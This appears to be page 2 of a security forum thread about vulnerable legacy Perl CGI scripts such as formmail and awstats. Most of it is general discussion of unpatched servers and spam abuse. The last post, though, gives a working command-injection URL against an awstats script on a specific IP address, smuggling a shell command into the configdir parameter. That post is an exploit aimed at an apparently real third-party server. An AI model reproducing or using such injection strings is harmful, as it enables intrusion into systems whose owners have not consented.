Page 2 of 2 FirstFirst 12
Results 11 to 13 of 13

Thread: formmail.pl

  1. #11
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    Originally posted here by sploiterwannabe
    yep i have read, and discussion here is about web security
    most perl scripts can make anybody gain access to servers
    like count.cgi for example or awstats.pl, calendar.pl
    with this scripts somebody could view files and folders on certain servers
    Most perl scripts? I don't think so. Only the badly written ones.
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  2. #12
    Senior Member
    Join Date
    Mar 2004
    Location
    Colorado
    Posts
    421
    Originally posted here by Black Cluster
    Abandon the chances of finding such a vulnerability nowadays .... Unless you are dealing with REALLY REALLY non-patched system and most importantly .. stupid admins
    We have found that any webserver that has been running for more than a few years has a good chance of running a bad perl script like formmail. There was a time when a large percentage of "home pages" got their guestbooks, hitcounters, and form processors from Matt's Script Archive since they were the "cgi" download spot of choice in the mid 1990s.
    Just last fall we upgraded ~ 100 webservers a company had from another company they took over...All running bad versions of formmail. Was spammer heaven to be sure.

  3. #13
    unppatched awstats script

    http://194.168.163.54/cgi-bin/awstat....pl?configdir=|echo;ls%20-alF;exit|

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •